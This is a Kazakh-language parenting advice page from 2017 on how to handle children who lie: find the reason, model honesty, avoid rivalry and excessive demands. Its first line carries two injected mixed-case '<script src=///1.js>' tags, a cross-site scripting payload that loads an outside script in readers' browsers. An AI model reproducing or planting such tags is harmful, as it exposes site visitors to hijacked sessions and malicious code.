<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.09.2017

    «  Шындық ізгі қасиеті»

 

● Өтіріктің шығуына не себеп

болғанын анықтаңыз және оған талдау жасап көріңіз.

● Баланың әдейі немесе

кінәсіз  өтірік айтқанын анықтаңыз.

● Егер әдейі айтса, онда неге? Сіз неге кінәлісіз? Бұл жағдайда кім ұтылды: Сіз, балаңыз немесе бөтен адам. Өтіріктің ішінде қандай ақпарат

жатыр?

● Бұл өтіріктің түрін анықтап көріңіз: шабуыл-өтірік, қорғаныс-өтірік, фантазия-өтірік?

● Өтіріктің себебін анықтадым деп ойласаңыз, онда тез арада іс-әрекет жасап

балаңызға көмектесуге тырысыңыз. Балаңызға өтіріктің арты не болатынын және

адал болудың қажеттілігін 

түсіндіріңіз.  Өзіңіз білетін

жайттарды айтыңыз,  өтірік жағымсыз

жағдайларға әкеліп соқтыратынын айтыңыз.

● Тек қана шындықты айтуды

үйретіңіз.

● Бала өзін-өзі жоғары бағалай

білу керек, Сіз ол үшін қолыңыздан келгенін аямаңыз. Жиі-жиі мақтап-мадақтап

отырыңыз.

● Отбасыңыздағы балалар арасында

қызғанушылық немесе бәсекелестік тудырмаңыз.

● Балаға өте биік талаптар қоюға

болмайды. Баланы жас ерекшелігіне сәйкес қорғау керек. Оның қолынан келетін

істерді ғана тапсыру керек.

● Балаға шектен тыс қамқорлық

жасамау керек.

● Бала  өзімен жастыларға қарап алдай бастаса, онда

тез арада кірісіп, қажет болса олармен қарым-қатынасты тоқтатыңыз.

● Ал егер бала өтірігімен Сізді

қайталаса, онда ойланыңыз. Баланы адалдыққа үйреткіңіз келсе өзіңіз де адал

болыңыз.

● Есте сақтаңыз, кішкентай

өтірікші – үлкен психолог. Сондықтан, оның өтірігіне қалай қарасаңыз, ол өзіне

Сіздің қалай қарайтыныңызды таразылай алады.

 

 

 

 

 

 

 

Просмотров: 368


Пікір қосу



Деректерді қолтаңбаға қосу